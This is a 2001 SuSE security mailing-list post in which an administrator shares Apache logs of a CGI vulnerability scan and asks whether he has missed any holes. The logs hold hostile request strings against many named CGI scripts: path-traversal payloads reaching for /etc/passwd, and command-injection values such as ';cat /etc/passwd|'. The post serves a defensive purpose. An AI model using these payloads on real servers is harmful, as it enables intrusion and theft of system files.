New subject: [suse-security] Any cgi vulnarabilities that I missed

15 Nov 2001

      This is what I have in my logs I just put the this guy with his /27
ipblock to return-rst chain but I want to make sure I have no
vulnarabilities. The guy/girl also did a port scan with a lot of  

SuSE7.1 running Apache 1.3.19 with all uptodate with regards to SuSE
security announcements.

Is there a need to check anything else  because I was planning to get
mod_perl installed with cgi-bin enabled (now I need to think again)

-- 
Togan Muftuoglu

212.174.224.28 - - [15/Nov/2001:10:59:38 +0200] "HEAD /cgi-bin/ HTTP/1.0" 403 0
212.174.224.28 - - [15/Nov/2001:10:59:38 +0200] "HEAD /cgi-bin/ad.cgi HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:38 +0200] "HEAD /cgi-bin/aglimpse HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:38 +0200] "HEAD /cgi-bin/AnyForm2 HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:39 +0200] "HEAD /cgi-bin/bbs_forum.cgi HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:39 +0200] "HEAD /cgi-bin/bsguest.cgi HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:39 +0200] "HEAD /cgi-bin/bslist.cgi HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:39 +0200] "HEAD /cgi-bin/campas HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:39 +0200] "HEAD /// HTTP/1.0" 200 0
212.174.224.28 - - [15/Nov/2001:10:59:39 +0200] "HEAD ///carbo.ddl HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:40 +0200] "HEAD /cgi-bin/count.cgi HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:40 +0200] "HEAD /cgi-bin/cgforum.cgi HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:40 +0200] "HEAD /cgi-bin/faxsurvey HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:40 +0200] "HEAD /cgi-bin/gbook.cgi HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:40 +0200] "HEAD /cgi-bin/htsearch HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:40 +0200] "HEAD /cgi-bin/htmlscript HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:40 +0200] "HEAD /cgi-bin/jj HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:41 +0200] "HEAD /technote/ HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:41 +0200] "HEAD /cgi-bin/mmstdod.cgi HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:41 +0200] "HEAD /cgi-bin/newdesk HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:41 +0200] "HEAD /cgi-bin/register.cgi HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:41 +0200] "HEAD /cgi-bin/simplestguest.cgi HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:42 +0200] "HEAD /cgi-bin/statusconfig.pl HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:42 +0200] "HEAD /cgi-bin/webgais HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:42 +0200] "HEAD /iisadmpwd/ HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:43 +0200] "HEAD /cgi-bin/perl.exe HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:43 +0200] "HEAD /cgi-dos/ HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:43 +0200] "HEAD /scripts/ HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:43 +0200] "HEAD /cgi-bin/infosrch.cgi HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:43 +0200] "HEAD /cgi-bin/rguest.exe HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:43 +0200] "HEAD /mall_log_files/ HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:44 +0200] "HEAD /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:44 +0200] "HEAD /Admin_files/ HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:44 +0200] "GET ///quote.html HTTP/1.0" 404 206
212.174.224.28 - - [15/Nov/2001:10:59:44 +0200] "GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 213
212.174.224.28 - - [15/Nov/2001:10:59:44 +0200] "HEAD /cgi-bin/dcboard.cgi HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:44 +0200] "GET /cgi-bin/nph-maillist.pl HTTP/1.0" 404 217
212.174.224.28 - - [15/Nov/2001:10:59:45 +0200] "GET /cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 HTTP/1.0" 404 214
212.174.224.28 - - [15/Nov/2001:10:59:45 +0200] "GET /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.0" 404 217
212.174.224.28 - - [15/Nov/2001:10:59:45 +0200] "HEAD /cgi-bin/ikonboard/ HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:46 +0200] "HEAD /foldoc/ HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:46 +0200] "HEAD /cgi-bin/adcycle/ HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:46 +0200] "GET /cgi-bin/store.cgi?StartID=../etc/passwd%00.html HTTP/1.0" 404 211
212.174.224.28 - - [15/Nov/2001:10:59:46 +0200] "HEAD /cgi-bin/commerce.cgi?page=../../../../etc/hosts%00index.html HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:46 +0200] "GET /cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd HTTP/1.0" 404 212
212.174.224.28 - - [15/Nov/2001:10:59:47 +0200] "GET /cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00 HTTP/1.0" 404 209
212.174.224.28 - - [15/Nov/2001:10:59:47 +0200] "HEAD /cgi-bin/mailnews.cgi HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:47 +0200] "HEAD /cgi-bin/newsdesk.cgi HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:47 +0200] "HEAD /cgi-bin/pals-cgi HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:47 +0200] "HEAD /ROADS/ HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:47 +0200] "GET /cgi-bin/sendtemp.pl?templ=../../etc/passwd HTTP/1.0" 404 213
212.174.224.28 - - [15/Nov/2001:10:59:48 +0200] "HEAD /way-board/ HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:48 +0200] "GET /cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd HTTP/1.0" 404 214
212.174.224.28 - - [15/Nov/2001:10:59:48 +0200] "HEAD /cgi-bin/DCShop/Orders/orders.txt HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:48 +0200] "HEAD /cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:49 +0200] "HEAD /cgi-bin/a1stats/ HTTP/1.0" 404 0
212.174.224.28 - - [15/Nov/2001:10:59:49 +0200] "GET /cgi-bin/get32.exe HTTP/1.0" 404 211
212.174.224.28 - - [15/Nov/2001:10:59:49 +0200] "GET /cgi-bin/auktion.cgi?menue=../../../../../../../../../etc/passwd HTTP/1.0" 404 213
212.174.224.28 - - [15/Nov/2001:10:59:49 +0200] "GET ///index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0" 404 205
212.174.224.28 - - [15/Nov/2001:10:59:49 +0200] "GET /cgi-bin/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0" 404 211
212.174.224.28 - - [15/Nov/2001:10:59:49 +0200] "GET ///edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;ls;%20 HTTP/1.0" 404 210
212.174.224.28 - - [15/Nov/2001:10:59:50 +0200] "GET /cgi-bin/eshop.pl?seite=;cat%20/etc/passwd| HTTP/1.0" 404 210

Any cgi vulnarabilities that I missed

Togan Muftuoglu

Michael Appeldorn

Peter Nixon

Togan Muftuoglu

tags

participants (3)